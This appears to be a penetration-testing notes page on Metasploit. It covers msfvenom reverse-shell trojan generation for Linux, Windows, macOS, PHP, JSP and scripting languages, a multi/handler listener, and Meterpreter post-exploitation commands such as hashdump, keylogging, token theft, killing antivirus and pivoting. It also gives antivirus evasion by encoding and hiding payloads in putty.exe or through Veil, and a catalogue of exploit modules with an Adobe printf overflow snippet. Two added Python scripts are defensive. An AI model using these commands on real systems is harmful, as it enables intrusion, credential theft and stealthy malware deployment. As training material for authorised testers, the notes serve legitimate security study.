Metasploit Penetration Testing

1. Metasploit overall framework:

Type msfconsole directly in the shell
Start the PostgreSQL database service: service postgresql start (listens on port 5432)
Initialize the Metasploit database: msfdb init
Check the database connection status: db_status (inside msfconsole)
Rebuild the module cache: db_rebuild_cache (inside msfconsole)

Terminology

– Exploit: the attack tool/code
– Payload: the attack payload delivered by the exploit
– Shellcode
– Module
– Listener

Directory layout:

Kali Linux: /usr/share/metasploit-framework

Frequently used commands

show exploits – list all available exploit modules
show auxiliary – list all available auxiliary modules
show options – show all options of the current module
show payloads – list all payloads compatible with the current module
show targets – list the target types the current module supports
search – search for modules by keyword
info – show detailed information about a module
use – select an exploit module
back – leave the current module
set/unset – set/clear a module option
setg/unsetg – set/clear a global option that applies to all modules
save – save the current settings so they are still available the next time the MSF console starts

msfvenom (payload generator and encoder)

Main parameters:
-p payload
-e encoder
-i number of encoding iterations
-b bytes that must not appear in the generated output
-f exe  output in EXE format
-l list the available payloads, e.g. msfvenom -l payloads | grep windows | grep x64 | grep tcp
LHOST, LPORT  IP and port of the host that listens for the callback

1. Generating a trojan file

By operating system:

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=xx -f macho > shell.macho

By development language:
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=xx -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=xx -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=xx -f war > shell.war

By scripting language:
Python:
msfvenom -p cmd/unix/reverse_python LHOST=x.x.x.x LPORT=xx -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=x.x.x.x LPORT=xx -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=x.x.x.x LPORT=xx -f raw > shell.pl

Example:

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.0.4 LPORT=443 -f exe > abc.exe
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 172.16.0.4
msf exploit(handler) > set ExitOnSession false  # keep the handler listening even after a session exits
msf exploit(handler) > exploit -j -z  # -j run as a background job; -z do not interact with the session once it is established
msf exploit(handler) > jobs  # list background jobs
msf exploit(handler) > kill <id>  # stop a background job
msf exploit(handler) > sessions -l  # list sessions
msf exploit(handler) > sessions -i 2  # interact with a session
msf exploit(handler) > sessions -k 2  # kill a session
Ctrl+z  send the session to the background
Ctrl+c  terminate the session

Meterpreter post-exploitation:

Meterpreter provides anti-forensics, a purely in-memory mode of operation, system information gathering, password hash dumping, file upload/download, screen capture, keystroke logging, privilege escalation, pivoting, and more.
meterpreter > background  send the session to the background
meterpreter > exit  close the session
meterpreter > help  help
meterpreter > sysinfo  system platform information
meterpreter > screenshot  capture the screen
meterpreter > shell  command shell (exit to leave it)
meterpreter > getlwd  show the local working directory
meterpreter > lcd  change the local directory
meterpreter > getwd  show the remote working directory
meterpreter > ls  list files
meterpreter > cd  change directory
meterpreter > rm  delete a file
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt  download a file
meterpreter > upload /var/www/wce.exe wce.exe  upload a file
meterpreter > search -d c: -f *.doc  search for files
meterpreter > execute -f cmd.exe -i  run a program/command
meterpreter > ps  list processes
meterpreter > run post/windows/capture/keylog_recorder  keystroke logging
meterpreter > getuid  show the current user
meterpreter > use priv  load the priv extension
meterpreter > getsystem  escalate to SYSTEM
meterpreter > hashdump  dump password hashes
meterpreter > ps  find the PID of a high-privilege process
meterpreter > steal_token <PID>  steal a token
meterpreter > rev2self  revert to the original token
meterpreter > migrate <pid>  migrate to another process
meterpreter > run killav  stop antivirus software
meterpreter > run getgui -e  enable Remote Desktop
meterpreter > portfwd add -l 1234 -p 3389 -r <target IP>  port forwarding
meterpreter > run get_local_subnets  get the internal subnets
meterpreter > run autoroute -s <internal subnet>  add a route automatically
meterpreter > run autoroute -p  show the routing table
Setting up a proxy channel:
msf > use auxiliary/server/socks4a  SOCKS4a proxy module
msf auxiliary(socks4a) > show options
msf auxiliary(socks4a) > run
Configuring proxychains:
nano /etc/proxychains.conf  change the proxy port to match the one set above
quiet_mode: enable quiet mode by uncommenting this parameter

AV evasion techniques:

1. Multiple-encoding evasion
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o /var/www/html/reverse_http_encode.exe
2. Evasion using a custom binary as the file template
Uses putty.exe as the file template: the payload runs hidden alongside the normal putty program, and an encoder is applied as well.
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai -i 5 -x ~/putty.exe
3. Generating evasive code with Veil
Download:
https://github.com/Veil-Framework/Veil-Evasion (Evasion only)
https://github.com/Veil-Framework/Veil
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
cd setup
sudo ./setup.sh -c  # just press Enter all the way through; the default installation is fine
cd ~/Veil
./Veil.py
use Evasion  # use the Veil-Evasion tool
list  # list all modules
use  # use a module
use c/meterpreter/rev_http.py
set  # set a variable
generate  # generate the executable
Then load the msf handler module and wait for the target to connect back.

2. Metasploit Auxiliary:

2.1 scanner:

portscan SYN scan
use auxiliary/scanner/portscan/syn
Metasploit SMB scan to obtain system information
use auxiliary/scanner/smb/smb_version
Batch SSH fingerprinting
use auxiliary/scanner/ssh/ssh_version
Batch FTP fingerprinting
use auxiliary/scanner/ftp/ftp_version
SNMP scanning and enumeration
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
SMB login verification
use auxiliary/scanner/smb/smb_login
VNC authentication check
use auxiliary/scanner/vnc/vnc_none_auth

2.2 sniffer:

Password sniffing
use auxiliary/sniffer/psnuffle

2.3 Scanning with wmap:

wmap summary:

1. Start the msf database
2. Load wmap in msf
load wmap
3. Add a site to wmap
wmap_sites -a  http://xxx.com.cn
List the added sites
wmap_sites -l
4. Add a target to wmap
wmap_targets -t http://192.168.x.xxx
Add a target by site id with -d
wmap_targets -d 0
Clear the target list
wmap_targets -c
5. Run the vulnerability scan
wmap_run -e
6. View the vulnerabilities found
wmap_vulns
7. Export the scan results
db_export -f xml /root/database.xml

Scan example in detail: http://192.168.19.141

msf > load wmap 

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites  -h 
[*] Usage: wmap_sites [options]
	-h        Display this help text
	-a [url]  Add site (vhost,url)
	-d [ids]  Delete sites (separate ids with space)
	-l        List all available sites
	-s [id]   Display site structure (vhost,url|ids) (level) (unicode output true/false)


msf > wmap_sites  -a http://192.168.19.141
[*] Site created.
msf > wmap_targets -c 

msf > wmap_targets  -h 
[*] Usage: wmap_targets [options]
	-h 		Display this help text
	-t [urls]	Define target sites (vhost1,url[space]vhost2,url) 
	-d [ids]	Define target sites (id1, id2, id3 ...)
	-c 		Clean target sites list
	-l  		List all target sites

msf > wmap_targets  -d 0
[*] Loading 192.168.19.141,http://192.168.19.141:80/.
msf > wmap_targets  -l 
[*] Defined targets
===============

     Id  Vhost           Host            Port  SSL    Path
     --  -----           ----            ----  ---    ----
     0   192.168.19.141  192.168.19.141  80    false  	/
 
msf > wmap_run -e 
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: 192.168.19.141 (192.168.19.141)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2018-09-09 05:26:51 -0400
[*] Loading wmap modules...
[*] 39 wmap enabled modules loaded.
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[+] 192.168.19.141:80 Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Attempting to connect to 192.168.19.141:80
[+] No File(s) found
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[-] 192.168.19.141 does not appear to be vulnerable, will not continue
[*] Module auxiliary/scanner/http/frontpage_login
[*] 192.168.19.141:80     - http://192.168.19.141/ may not support FrontPage Server Extensions
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[+] 192.168.19.141 allows GET,HEAD,POST,OPTIONS methods
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/scraper
[+] [192.168.19.141] / [SQL Injections]
[*] Module auxiliary/scanner/http/svn_scanner
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*]  >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] 192.168.19.141 (Apache/2.4.7 (Ubuntu)) WebDAV disabled.
[*] Module auxiliary/scanner/http/webdav_website_content
[*] 
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Path: /
[*] Module auxiliary/scanner/http/dir_scanner
[*] Path: /
[*] Detecting error code
[*] Using code '404' as not found for 192.168.19.141
[+] Found http://192.168.19.141:80/cgi-bin/ 403 (192.168.19.141)
[+] Found http://192.168.19.141:80/icons/ 403 (192.168.19.141)
[+] Found http://192.168.19.141:80/images/ 200 (192.168.19.141)
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/files_dir
[*] Path: /
[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.168.19.141:80/index.html 200
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[+] Found http://192.168.19.141:80/readme.txt 200
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension 
[+] Found http://192.168.19.141:80/images 301
[+] Found http://192.168.19.141:80/index 200
[+] Found http://192.168.19.141:80/readme 200
[*] Using code '404' as not found for files with extension 
[+] Found http://192.168.19.141:80/images 301
[+] Found http://192.168.19.141:80/index 200
[+] Found http://192.168.19.141:80/readme 200
[*] Module auxiliary/scanner/http/http_put
[*] Path: /
[-] 192.168.19.141: File doesn't seem to exist. The upload probably failed
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Path: /
[-] 192.168.19.141:80 Folder does not require authentication. [405]
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Path: /
[*] Starting scan with 0ms delay between requests
[*] Server 192.168.19.141:80 returned HTTP 404 for /.  Use a different one.
[*] Module auxiliary/scanner/http/trace_axd
[*] Path: /
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*] 
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*] 
=[ Query testing ]=
============================================================
[*] 
=[ General testing ]=
============================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Launch completed in 169.54123091697693 seconds.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[*] Done.
msf > wmap_vulns 
[*] Usage: wmap_vulns [options]
	-h 		Display this help text
	-l 		Display web vulns table

msf > wmap_vulns -l 
[*] + [192.168.19.141] (192.168.19.141): scraper /
[*] 	scraper Scraper
[*] 	GET SQL Injections
[*] + [192.168.19.141] (192.168.19.141): directory /cgi-bin/
[*] 	directory Directoy found.
[*] 	GET Res code: 403
[*] + [192.168.19.141] (192.168.19.141): directory /icons/
[*] 	directory Directoy found.
[*] 	GET Res code: 403
[*] + [192.168.19.141] (192.168.19.141): directory /images/
[*] 	directory Directoy found.
[*] 	GET Res code: 200
[*] + [192.168.19.141] (192.168.19.141): file /index.html
[*] 	file File found.
[*] 	GET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /readme.txt
[*] 	file File found.
[*] 	GET Res code: 200
[*] + [192.168.19.141] (192.168.19.141): file /images
[*] 	file File found.
[*] 	GET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /index
[*] 	file File found.
[*] 	GET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /readme
[*] 	file File found.
[*] 	GET Res code: 404
msf > 
# Reference: https://www.jianshu.com/p/67315789a8f8
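The wmap summary and the transcript above share one weakness that a practitioner hits immediately: `wmap_vulns -l` lists every stored result as a "vulnerability", including paths the files_dir module recorded with a 404 response (compare /index.html, reported 200 in the scan log but stored as 404 in the table) and the scraper module's entry, which is only the page title it extracted. The following script is an added example, not part of the original page or of Metasploit: it parses that listing (the page's own transcript, embedded as a constructed constant so it runs offline) into records and sorts them into confirmed, forbidden, false-positive and needs-review buckets before anything goes into a report. The `Finding` class, the bucket names and the triage rules are this example's own.

```python
"""Triage the text printed by `wmap_vulns -l` (added example, not page code)."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed constant: the wmap_vulns -l listing from the page's transcript.
SAMPLE_WMAP_VULNS = """\
[*] + [192.168.19.141] (192.168.19.141): scraper /
[*] \tscraper Scraper
[*] \tGET SQL Injections
[*] + [192.168.19.141] (192.168.19.141): directory /cgi-bin/
[*] \tdirectory Directoy found.
[*] \tGET Res code: 403
[*] + [192.168.19.141] (192.168.19.141): directory /icons/
[*] \tdirectory Directoy found.
[*] \tGET Res code: 403
[*] + [192.168.19.141] (192.168.19.141): directory /images/
[*] \tdirectory Directoy found.
[*] \tGET Res code: 200
[*] + [192.168.19.141] (192.168.19.141): file /index.html
[*] \tfile File found.
[*] \tGET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /readme.txt
[*] \tfile File found.
[*] \tGET Res code: 200
[*] + [192.168.19.141] (192.168.19.141): file /images
[*] \tfile File found.
[*] \tGET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /index
[*] \tfile File found.
[*] \tGET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /readme
[*] \tfile File found.
[*] \tGET Res code: 404
"""

# "[*] + [vhost] (host): kind path" opens one finding ...
HEADER_RE = re.compile(
    r"^\[\*\] \+ \[(?P<vhost>[^\]]+)\] \((?P<host>[^)]+)\): (?P<kind>\w+) (?P<path>\S+)$"
)
# ... followed by indented "key value" lines (key = the kind, or an HTTP method).
DETAIL_RE = re.compile(r"^\[\*\]\s+(?P<key>\S+) (?P<value>.*)$")
CODE_RE = re.compile(r"Res code: (\d{3})")


@dataclass
class Finding:
    host: str
    kind: str               # scraper, directory or file
    path: str
    description: str = ""   # wmap's own text, e.g. "Directoy found." (sic)
    detail: str = ""        # e.g. "Res code: 403" or the scraped page title
    code: Optional[int] = None


def parse_wmap_vulns(text: str) -> list[Finding]:
    """Turn the console listing into Finding records."""
    findings: list[Finding] = []
    current: Optional[Finding] = None
    for line in text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            current = Finding(header["host"], header["kind"], header["path"])
            findings.append(current)
            continue
        detail = DETAIL_RE.match(line)
        if not detail or current is None:
            continue
        key, value = detail["key"], detail["value"]
        if key == current.kind:
            current.description = value
        elif key in ("GET", "POST", "HEAD"):
            current.detail = value
            code = CODE_RE.search(value)
            current.code = int(code.group(1)) if code else None
    return findings


def classify(f: Finding) -> str:
    """Bucket for one finding; the rules are this example's, not wmap's."""
    if f.kind == "scraper" or f.code is None:
        return "review"          # scraped title / no response code: not a vuln by itself
    if f.code == 404:
        return "false_positive"  # stored as "found" although the server said not found
    if f.code in (401, 403):
        return "forbidden"       # exists but protected: worth a note, not a hole
    if 200 <= f.code < 300:
        return "confirmed"
    return "review"              # redirects and anything else: check by hand


def triage(findings: list[Finding]) -> dict[str, list[Finding]]:
    buckets: dict[str, list[Finding]] = defaultdict(list)
    for f in findings:
        buckets[classify(f)].append(f)
    return dict(buckets)


def summarize(text: str) -> dict[str, int]:
    """Bucket name -> number of findings, for a quick sanity check of a scan."""
    return {name: len(items) for name, items in triage(parse_wmap_vulns(text)).items()}


if __name__ == "__main__":
    for name, items in triage(parse_wmap_vulns(SAMPLE_WMAP_VULNS)).items():
        print(f"== {name} ({len(items)})")
        for f in items:
            print(f"  {f.kind:9} {f.path:14} {f.detail}")
```

Run on the page's listing, only /images/ and /readme.txt come out as confirmed; four of the nine entries are 404 false positives and the scraper entry needs a human look. The same parser works on a listing saved from any other wmap run, because it keys on the line shape rather than on the host.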

 

Chapter 2 Information gathering and scanning

2.1 Categories of information gathering:

  • Passive information gathering
  • Active information gathering
  • Social engineering

2.2 Passive information gathering 1.0: the traditional way

whois

dig

nslookup

Online lookups

  • http://who.is
  • http://www.kloth.net

2.3 Passive information gathering 1.0: the upgraded way

Zone transfers:

SMTP headers:

Google dorks:

2.4 Port scanning with Nmap

Four scan types are analyzed: TCP connect scan, SYN stealth scan, UDP scan, ACK scan (-sT, -sS, -sU, -sA)

TCP connect [-sT]

SYN scan [-sS]

UDP scan [-sU]

ACK scan [-sA]

-sV

-O

Decoy [-D]

increases anonymity

2.5 Auxiliary modules for scanning

/modules/auxiliary/scanner

Search for port scanners

search portscan

Batch-test whether Tomcat and similar services are exposed

2.6 Vulnerability scanning with Nessus

msf> db_connect msf3:8b826ac0@127:7175/msf3

msf> load nessus

msf> nessus_connect root:toor@localhost ok

msf> nessus_scan 1 testscan 192.168.56.102

msf> nessus_report_list

msf> nessus_report_get xxx

msf> hosts -c address,vuls,os_name

2.7 Scanning with NeXpose

msf> db_connect msf3:8b826ac0@127:7175/msf3

msf> load nexpose

msf> nexpose_connect darklord:toor@localhost ok

msf> nexpose_discover 192.168.56.102

msf> hosts -c address,os_name,os_flavor

msf> db_import nexposelist.xml

2.8 Sharing scan information with the Dradis framework

3 Operating-system vulnerability assessment and exploitation

1. Windows XP

1.1 MS03_026_dcom

exploit/windows/dcerpc/ms03_026_dcom

Rank: great  port: 135

The DCOM (Distributed Component Object Model) interface runs on top of RPC; the RPC implementation mishandles malformed messages.

payload  windows/adduser

payload  windows/shell/bind_tcp

# You can open the payload's source file to see how adduser is implemented.

2. Windows 2003 Server

2.1 MS08_067_netapi

exploit/windows/smb/ms08_067_netapi

Rank: great   port: 445

A parsing flaw in the path canonicalization code of netapi32.dll; the module can bypass NX and avoids crashing the Server service.

3. Windows 7/Server 2008 R2

3.1 ms10_006_negotiate_response_loop

auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

Rank: normal

A UNC path is embedded in a web page and the target user is lured into opening it; once the user opens the shared file, the target system crashes completely and can only be recovered by rebooting.

msf exploit(ms08_067_netapi) > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > run 

[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\127.0.0.1\Shared\Anything
[*] Server started.

  

4. Linux

4.1 Samba

exploit/linux/samba/lsa_transnames_heap

CVE-2007-2446

Triggers a heap overflow in the LSA RPC service of the Samba daemon and uses the talloc chunk overwrite method (credit Ramon and Adriano).

Applies to Samba 3.0.21-3.0.24

Two modules worth studying:

1. Samba chain_reply memory corruption:

The memory allocated for the response packet can be corrupted by passing a value larger than the destination buffer.

Affected versions: Samba before 3.3.13

2. Samba trans2open overflow:

Exploits the vulnerability on x86 Linux machines without a non-executable (noexec) stack.

Affected versions: Samba 2.2.0-2.2.8

 

5. Understanding Windows DLL injection

5.1 webdav_dll_hijacker

exploit/windows/browser/webdav_dll_hijacker

Creates a directory path containing the vulnerable file; the target machine must open that path to trigger the vulnerability.

The directory can be a file, a folder prepared in advance, a USB drive, a network share, and so on.

The created file is harmless by itself, but it triggers the DLL injection vulnerability against the target system.

A DLL (dynamic-link library) is Microsoft Windows' implementation of shared libraries.

At run time, LoadLibrary() loads the DLLs the program needs. If no location is specified, or a library path that is not fully qualified is supplied,

a defined search order is used to locate the DLL, and one of the default search locations is the program's current working directory.

Because the current working directory is controlled by the attacker, the attacker can place a malicious DLL there, which the operating system then executes,

allowing the attacker to run external scripts; once the payload executes successfully, a shell connection is established.
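To make the search-order argument concrete, here is a small Python model of the loader's lookup, written as an added example; it is not code from the page, from the webdav_dll_hijacker module or from Windows. It assumes the documented default order for SafeDllSearchMode=1 (application directory, system directory, 16-bit system directory, Windows directory, current working directory, then PATH) and leaves out KnownDLLs, already-loaded modules and manifests; the directory names, `helper.dll` and the `LoaderEnv`/`resolve` helpers are constructed. It shows the three outcomes a defender cares about: an unqualified name that the application directory does not satisfy falls through to the current directory (here, the share); a fully qualified path never consults the search order; and removing the current directory from the search (what SetDllDirectory("") or the CWDIllegalInDllSearch policy does) turns the hijack into a plain load failure.

```python
"""Toy model of the Windows DLL search order (added example, not page code).

Assumption: the slot order below is the documented default when
SafeDllSearchMode=1.  KnownDLLs, already-loaded modules and manifests are
deliberately not modelled.  All paths and DLL names are constructed.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass, field
from typing import Optional

# Search slots in the order the loader tries them for an unqualified name.
SAFE_SEARCH_ORDER = ("app_dir", "system_dir", "system16_dir", "windows_dir", "cwd", "path_dirs")


@dataclass
class LoaderEnv:
    """What the loader knows: the well-known directories and which files exist."""
    app_dir: str
    system_dir: str
    system16_dir: str
    windows_dir: str
    cwd: str
    path_dirs: list[str]
    files: set[str]                 # full paths of every file that exists
    cwd_in_search: bool = True      # False models SetDllDirectory("") / CWDIllegalInDllSearch
    _index: set[str] = field(init=False, repr=False)

    def __post_init__(self) -> None:
        # Windows paths are case-insensitive; normcase also folds '/' to '\'.
        self._index = {ntpath.normcase(ntpath.normpath(f)) for f in self.files}

    def exists(self, path: str) -> bool:
        return ntpath.normcase(ntpath.normpath(path)) in self._index


def resolve(env: LoaderEnv, name: str) -> Optional[str]:
    """Return the path LoadLibrary(name) would load in this model, or None."""
    if ntpath.isabs(name):
        # Fully qualified: no search at all; the file either exists or it does not.
        return name if env.exists(name) else None
    if "\\" in name or "/" in name:
        # Relative path with a directory part: resolved against the CWD only.
        candidate = ntpath.normpath(ntpath.join(env.cwd, name))
        return candidate if env.exists(candidate) else None
    for slot in SAFE_SEARCH_ORDER:
        if slot == "cwd" and not env.cwd_in_search:
            continue                # the mitigation: CWD is simply never consulted
        directories = env.path_dirs if slot == "path_dirs" else [getattr(env, slot)]
        for directory in directories:
            candidate = ntpath.join(directory, name)
            if env.exists(candidate):
                return candidate
    return None


def make_env(cwd_in_search: bool = True, legit_helper_in_app_dir: bool = False) -> LoaderEnv:
    """Constructed scenario: the application is started with its CWD on a share."""
    files = {
        r"C:\Program Files\App\app.exe",
        r"C:\Windows\System32\kernel32.dll",
        r"\\share\docs\report.doc",      # the document the user opened
        r"\\share\docs\helper.dll",      # a DLL planted next to it (constructed name)
    }
    if legit_helper_in_app_dir:
        files.add(r"C:\Program Files\App\helper.dll")
    return LoaderEnv(
        app_dir=r"C:\Program Files\App",
        system_dir=r"C:\Windows\System32",
        system16_dir=r"C:\Windows\System",
        windows_dir=r"C:\Windows",
        cwd=r"\\share\docs",
        path_dirs=[r"C:\Windows\System32", r"C:\Windows"],
        files=files,
        cwd_in_search=cwd_in_search,
    )


def hijack_demo() -> dict[str, Optional[str]]:
    """The scenarios side by side: which file each LoadLibrary call would pick."""
    return {
        "system_dll": resolve(make_env(), "kernel32.dll"),                  # found in System32
        "unqualified_missing": resolve(make_env(), "helper.dll"),           # falls through to the share
        "cwd_removed": resolve(make_env(cwd_in_search=False), "helper.dll"),  # load fails instead
        "app_dir_wins": resolve(make_env(legit_helper_in_app_dir=True), "helper.dll"),
        "fully_qualified": resolve(make_env(), r"C:\Program Files\App\helper.dll"),  # share copy ignored
    }


if __name__ == "__main__":
    for case, result in hijack_demo().items():
        print(f"{case:22} -> {result}")
```

The two mitigations visible in the model are the ones to check for in an application: load DLLs by fully qualified path (or ship them in the application directory, where they win the search), and remove the current directory from the search with SetDllDirectory("") or the CWDIllegalInDllSearch policy so that a name the application directory cannot satisfy fails instead of being picked up from wherever the user happened to open a document.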

5.2 Detecting DLL injection vulnerabilities

H.D. Moore's DLLHijackAudit security auditing tool.

https://github.com/rapid7/DLLHijackAuditKit/releases/

 

6. Client-side exploitation and antivirus evasion

6.1 Internet Explorer

1. Unsafe scripting misconfiguration

exploit/windows/browser/ie_unsafe_scripting

Affected: IE 6, 7 (XP, 2003), IE 8 (Win7)

Tools | Internet | Options | Security | Custom Level | Initialize and script ActiveX controls not marked as safe | Enable

The exploit command generates a malicious link; after the victim clicks it, IE crashes or shows a blank page. (IE 8 requires the user to click the Allow button.)

The setting permits access to the WScript.Shell ActiveX control. The WScript.Shell object exposes functions for reading the file system and environment variables, reading and modifying the registry, managing shortcuts and so on,

so the attacker can use the control to create a JavaScript script that interacts with the target's file system and runs commands.

2. Internet Explorer Aurora memory corruption

exploit/windows/browser/ms10_002_aurora

CVE-2010-0249, a memory corruption attack targeting IE 6 only

In mid-2010 attackers used "Operation Aurora" against several top-tier companies

3. CSS recursive call memory corruption

exploit/windows/browser/ms11_003_ie_css_import

CVE-2010-3971, affects IE 8 (Win7 and Server 2008)

payload: windows/meterpreter/bind_tcp

Generates a malicious link; when the target opens it in IE, the browser "freezes" completely and consumes a large amount of system resources, so the target has to close the browser.

InitialAutoRunScript 'migrate -f'

migrate -f:

Moves the payload from the iexplore.exe process into a notepad.exe process.

This helps keep a persistent connection: even if the user closes the browser the session survives, because the shell has moved to another process.

If you see "Target machine does not have the .NET CLR 2.0.50727", set IE as the default browser.

6.2 Microsoft Office

1. Word RTF stack overflow

exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

CVE-2010-3333, affects Office 2010 and Office 2007

payload: windows/meterpreter/reverse_tcp

The malicious Word document passes an invalid value to the Word parser; the parser cannot recognize the invalid value and a buffer overflow results.

The payload then runs and establishes the connection. Whether the attack succeeds depends on the state of the target machine,

because Windows ASLR (address space layout randomization) can prevent arbitrary code execution.

2. Excel 2007 buffer overflow

exploit/windows/fileformat/ms11_021_xlb_bof

CVE-2011-0105, affects Excel 2007

Opening the malicious xlb file causes a stack overflow that leads to arbitrary code execution

6.3 Adobe

1. Adobe Reader util.printf() buffer overflow

exploit/windows/fileformat/adobe_utilprintf

CVE-2008-2992, affects versions < 8.1.3

Quickly resume the exploitation session: exploit/multi/handler

a special listener module

The implementation of the JavaScript function util.printf() in Adobe Reader is flawed.

The function converts the argument it receives into a string, but only uses the first 16 digits;

the remainder is padded with the fixed value 0 (0x30). If an overly long value is passed to the function...

var num = 1.2;

util.printf("%5000f", num);

These two simple lines copy the byte 0x20 onto the stack 5000 times, which makes it possible to control the exception handler and trigger an exception when the write reaches the memory past the end of the stack.

 

6.4 msfpayload

Run under BackTrack; Kali 2 has merged msfpayload and msfencode into msfvenom

Generating shellcode in C form from the windows/shell/reverse_tcp payload

msfpayload windows/shell/reverse_tcp O
msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 O
msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 C
msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 X > .local/setup.exe

6.5 msfencode

Run under BackTrack; Kali 2 has merged msfpayload and msfencode into msfvenom

3 examples:

msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 R | msfencode -e cmd/generic_sh -c 2 -t exe > .local/encoded.exe
msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 R | msfencode -e x86/shikata_ga_nai -c 20 -t exe -x cmd.exe > .local/cmdencoded.exe
